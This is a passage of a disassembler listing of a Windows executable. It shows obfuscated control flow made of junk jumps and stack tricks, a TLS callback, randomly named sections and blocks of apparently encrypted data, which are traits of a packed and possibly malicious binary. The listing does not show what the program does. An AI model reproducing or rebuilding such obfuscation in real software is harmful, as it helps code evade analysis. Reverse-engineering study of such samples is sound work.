; END OF FUNCTION CHUNK FOR sub_43094F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA8A
loc_4326C6: ; CODE XREF: sub_42EA8A+1�j
jmp loc_43204F
; END OF FUNCTION CHUNK FOR sub_42EA8A
; =============== S U B R O U T I N E =======================================
sub_4326CB proc near ; CODE XREF: j8.b78ws:0042FFF3�j
; sub_43119E+25�p
xchg edx, [esp+0]
pop edx
mov [ebp-28h], eax
mov dword ptr [ebp-14h], 4
jmp loc_4303DD
sub_4326CB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430BA0
loc_4326DE: ; CODE XREF: j8.b78ws:0042E762�j
; sub_430BA0:loc_42F91C�j
push esi
; END OF FUNCTION CHUNK FOR sub_430BA0
; =============== S U B R O U T I N E =======================================
sub_4326DF proc near ; CODE XREF: sub_430E65+9�p
; FUNCTION CHUNK AT 0042E666 SIZE 0000000A BYTES
xchg edi, [esp+0]
pop edi
add esp, 0FFFFFFF8h
mov [ebp-1], al
cmp byte ptr [ebp-1], 0
loc_4326ED: ; CODE XREF: j8.b78ws:loc_42ED3A�j
jz loc_42E666
jmp loc_42E36C
sub_4326DF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430343
loc_4326F8: ; CODE XREF: sub_430343+12�j
rol eax, 10h
mov ds:dword_432500, eax
retn
; END OF FUNCTION CHUNK FOR sub_430343
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432702 proc near ; CODE XREF: sub_431F6D-3D08�p
; j8.b78ws:loc_42E3CC�j ...
; FUNCTION CHUNK AT 004304DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432086 SIZE 00000010 BYTES
push ebp
loc_432703: ; CODE XREF: sub_42EA8A:loc_42EC65�j
mov ebp, esp
jmp loc_4304DC
sub_432702 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FED3
loc_43270A: ; CODE XREF: sub_42FED3+B6F�j
jg loc_43076D
jmp loc_430F10
; END OF FUNCTION CHUNK FOR sub_42FED3
; =============== S U B R O U T I N E =======================================
sub_432715 proc near ; CODE XREF: j8.b78ws:0042EC90�j
; sub_432786-84F�p
; FUNCTION CHUNK AT 0042E662 SIZE 00000004 BYTES
mov [esp+0], ecx
pop ecx
mov dword ptr [ebp-8], 1
loc_432720: ; CODE XREF: sub_42FFCD:loc_430CDC�j
; sub_431042+173F�j
mov eax, [ebp-8]
jmp loc_42E662
sub_432715 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_432728 proc near ; CODE XREF: sub_42E0DE+992�p
; FUNCTION CHUNK AT 0042E0C6 SIZE 00000013 BYTES
xchg ecx, [esp+0]
and ecx, 5FC4FA5Fh
jmp loc_42E0C6
sub_432728 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E5A2
loc_432736: ; CODE XREF: sub_42E5A2+10�j
push offset sub_430059
jmp j_nullsub_91
; END OF FUNCTION CHUNK FOR sub_42E5A2
; ---------------------------------------------------------------------------
pushf
jmp loc_42E4A4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_23. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4306C9
loc_432747: ; CODE XREF: sub_4306C9-A43�j
jmp loc_4315C1
; END OF FUNCTION CHUNK FOR sub_4306C9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_43274C: ; CODE XREF: sub_43119E:loc_431E1C�j
pop eax
xor eax, 0E015F4A9h
add eax, 22A4CCABh
mov eax, [eax]
or eax, eax
jnz loc_4300B9
jmp loc_42F79D
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBA9
loc_432768: ; CODE XREF: sub_42EBA9:loc_430F10�j
pushf
add ebp, 98BF0C1Ch
jnb j_nullsub_76
jmp loc_43076B
; END OF FUNCTION CHUNK FOR sub_42EBA9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431042
loc_43277A: ; CODE XREF: sub_431042:loc_42E36C�j
mov [ebp+var_8], 1
jmp loc_432720
; END OF FUNCTION CHUNK FOR sub_431042
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432786 proc near ; CODE XREF: sub_430E65�j
var_1 = byte ptr -1
; FUNCTION CHUNK AT 00431F2D SIZE 0000000F BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp+var_1], al
jmp loc_431F2D
sub_432786 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_432794: ; CODE XREF: j8.b78ws:00430926�j
jns loc_42F9CA
jbe loc_42FE7A
jmp sub_42E6B3
; ---------------------------------------------------------------------------
loc_4327A5: ; CODE XREF: j8.b78ws:004313DE�j
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call eax
push edx
call sub_431729
loc_4327B3: ; CODE XREF: j8.b78ws:0042FABA�j
jmp loc_42FD3C
; ---------------------------------------------------------------------------
call sub_42EB5A
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4327C0 proc near ; DATA XREF: sub_42EBA9+28�o
; FUNCTION CHUNK AT 0042E47D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FF08 SIZE 00000005 BYTES
push ebp
mov ebp, esp
jmp loc_42FF08
sub_4327C0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
and esi, ebx
jmp sub_431BAC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_432806
loc_4327CF: ; CODE XREF: sub_432806+19�j
cmp dword ptr [eax], 0
jnz loc_432810
jmp sub_43230B
; ---------------------------------------------------------------------------
loc_4327DD: ; CODE XREF: sub_432806:loc_432810�j
push eax
call sub_42FCBF
loc_4327E3: ; CODE XREF: j8.b78ws:0042EA66�j
and ebp, edi
; END OF FUNCTION CHUNK FOR sub_432806
; =============== S U B R O U T I N E =======================================
sub_4327E5 proc near ; CODE XREF: sub_43237F-1A�p
; FUNCTION CHUNK AT 0042EDF2 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004309E8 SIZE 00000005 BYTES
mov [esp+0], edx
pop edx
jnz loc_431206
mov eax, [ebp+8]
jmp loc_4309E8
sub_4327E5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EECE
loc_4327F7: ; CODE XREF: sub_42EECE:loc_432508�j
xor edx, esi
rol edx, 5
call sub_4308AB
loc_432801: ; CODE XREF: j8.b78ws:0042F940�j
jmp loc_42EDE2
; END OF FUNCTION CHUNK FOR sub_42EECE
; =============== S U B R O U T I N E =======================================
sub_432806 proc near ; CODE XREF: j8.b78ws:0042FFE8�j
; sub_430C12+A�p
; FUNCTION CHUNK AT 004327CF SIZE 00000016 BYTES
mov [esp+0], ebx
pop ebx
jz nullsub_78
loc_432810: ; CODE XREF: sub_42FCBF-1424�j
; sub_432806-34�j
jns loc_4327DD
push eax
push 0
call sub_42E8A6
pop eax
jmp loc_4327CF
sub_432806 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4307FC
loc_432824: ; CODE XREF: sub_4307FC-9AC�j
mov eax, [eax]
jmp loc_431F9A
; ---------------------------------------------------------------------------
loc_43282B: ; CODE XREF: sub_4307FC:loc_431026�j
or eax, eax
jz loc_42FE33
cmp eax, 0FFFFFFFFh
jz loc_42FE33
mov eax, [eax]
loc_43283E: ; CODE XREF: j8.b78ws:00431B65�j
jmp loc_42F948
; END OF FUNCTION CHUNK FOR sub_4307FC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FA02
loc_432843: ; CODE XREF: sub_42FA02:loc_43118E�j
shl eax, 2
mov edx, [ebp-14h]
mov edx, [edx+1Ch]
push offset loc_431FF9
jmp nullsub_84
; END OF FUNCTION CHUNK FOR sub_42FA02
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430DCF
loc_432856: ; CODE XREF: sub_430DCF-25EC�j
sbb ebx, 17F89419h
; END OF FUNCTION CHUNK FOR sub_430DCF
; =============== S U B R O U T I N E =======================================
sub_43285C proc near ; CODE XREF: sub_42E487+3672�p
; FUNCTION CHUNK AT 0042E05C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430EF6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00431748 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00431C3C SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
test byte ptr [ebp-8], 40h
jmp loc_42E05C
sub_43285C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
and edi, 0C4BA4671h
add eax, 22B4BDF7h
jmp sub_4322BE
; ---------------------------------------------------------------------------
TlsDirectory dw 0
db 2 dup(0)
TlsEnd_ptr dw 0
db 2 dup(0)
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsCallbacks
TlsSizeOfZeroFill dd 0
TlsCharacteristics dd 0
TlsIndex dw 0 ; DATA XREF: j8.b78ws:TlsIndex_ptr�o
db 2 dup(0)
TlsCallbacks dd offset TlsCallback_0 ; DATA XREF: j8.b78ws:TlsCallbacks_ptr�o
dd 0
dw 0E382h
dd 0D2F5E154h, 84F4275Fh, 7B9F0C43h, 0A65DE654h, 0F218E993h
dd 0A9238E13h, 1F67DEE7h, 0E9D06240h, 7B66D58Fh, 1C16CF8Dh
dd 0C25A101Eh, 3B407B5Eh, 25CB35F5h, 7911B6BDh, 152A5301h
dd 0FE558C52h, 0E8B925B4h, 20824781h, 2C97BB9Fh, 55054433h
dd 0DD5C33Fh, 78AD477Fh, 999319A2h, 2D500BF3h, 12E85E15h
dd 0C7CD6899h, 72F905DFh, 7B523867h, 10C21015h, 879E1F65h
dd 2D9EEA50h, 5B54CB2Dh, 9F7732D6h, 415C5C7Ah, 0A2359406h
dd 525694D8h, 20DC161Eh, 33C2BB5h, 5B84636Dh, 23283865h
dd 0D631BC7Fh, 3B3952FFh, 16C670CFh, 95E1E5E4h, 733FD501h
dd 29848372h, 4AAD9023h, 93226CAAh, 27D07491h, 0F3CF866h
dd 314B0E79h, 0FA70F6BCh, 1A3BAA02h, 90C096DFh, 0AB2C16ADh
dd 899793BAh, 4783F6A9h, 0A3C68624h, 21743DBAh, 61DDDEBCh
dd 0ABEE2772h, 8A47A504h, 819C1E6Eh, 203B8589h, 9332EB21h
dd 8BEAB43Ah, 92D4E771h, 0C368CA1h, 0E2DBBC28h, 50BAE16Dh
dd 7C4BEC99h, 0C63FFFD0h, 0C3830AD1h, 0AC39225Bh, 9C6301B1h
dd 0EE26F821h, 0DBB03B26h, 134421A6h, 61638A93h, 0C98DE522h
dd 362A1654h, 607FB70Dh, 8E14686Dh, 1650DF01h, 4A515BC5h
dd 44C5E54Fh, 396393ECh, 0F0E9289Eh, 180h dup(0)
j8_b78ws ends
; Section 4. (virtual address 00033000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00033000
; Flags 40000080: Bss Readable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read
_6dnn4fh4 segment para public 'BSS' use32
assume cs:_6dnn4fh4
;org 433000h
assume es:nothing, ss:nothing, ds:_packed, fs:nothing, gs:nothing
dd 1322ED7Bh, 0FAC417FAh, 4916BF73h, 470837CAh, 0A1AC1D69h
dd 899CF47Eh, 21DDED38h, 0BFE31E8Fh, 0C8785508h, 28E8E26Ah
dd 605ECECh, 61B6311Fh, 107A144h, 97C09E51h, 0A3E911A7h
dd 187F71FAh, 552E6C17h, 1519FEFCh, 71D60153h, 9690B0E3h
dd 0E85818C1h, 0E89F6BDh, 39D19CAFh, 5A0E1884h, 0ADA4A31Dh
dd 84CF64D8h, 747733CDh, 0A2F3BCDFh, 897AB774h, 665904ECh
dd 0B7A6345Ah, 9BA7276Bh, 88476053h, 0A792A098h, 0BE6D9EF0h
dd 0B0810D00h, 0C7DB5315h, 2F90CC4Bh, 0FE6DC175h, 59513588h
dd 55820252h, 6B392924h, 0EEE00E23h, 7336BE2Ch, 8A05568Ah
dd 0E4CC54CFh, 96ABFF97h, 0C8AB97C7h, 6A669918h, 86540FE0h
dd 2FD18E3Dh, 9C31F30h, 0EBF1921Dh, 8634D6A8h, 0FA0552D0h
dd 33655C82h, 0E6C88526h, 8C0E755Bh, 0CDAD63CDh, 62AA4747h
dd 0C10CDBD7h, 5A0B2CBCh, 5A23CC39h, 533B033Ch, 0AA4448E9h
dd 77B1616Dh, 0D053F16Ch, 6DAB3F54h, 9825FFBEh, 1782363h
dd 9E3C3EA8h, 0BB13204h, 0D3819BA8h, 8E843C7Ch, 59E246C6h
dd 2D95D90Ah, 1F57D805h, 7473CA2Eh, 0C083145Fh, 86D59703h
dd 0FBED252h, 47A1F027h, 9A500A95h, 22B570BBh, 0C3593B3Bh
dd 6B63855Bh, 739F49A9h, 0D9A4BC0Fh, 3DD83AF5h, 0C11D760Ah
dd 96238B27h, 0DC2E8936h, 0BA8361E8h, 74BBAFE6h, 3448C453h
dd 0A5FFB052h, 98B2459Dh, 213E90B6h, 6C31F0F4h, 0DCAEDA58h
dd 0D72A29DDh, 0F55CFA6Dh, 72EF5262h, 0B0808199h, 6CB53DF1h
dd 999AF26h, 56DB5819h, 0BEB7D2B3h, 44521270h, 54242E69h
dd 9813E860h, 9A0D3F65h, 34F878D9h, 0DD74E923h, 582C35AAh
dd 4EB025A1h, 4AAB9226h, 1F4F5B3h, 0FCEBAD17h, 0C41A7E29h
dd 718ECB36h, 0F865E7E4h, 0B5CFF5D4h, 0CC771804h, 3AE08297h
dd 83340209h, 144D91D5h, 0F181582Bh, 380h dup(0)
_6dnn4fh4 ends
; Section 5. (virtual address 00034000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00034000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 434000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start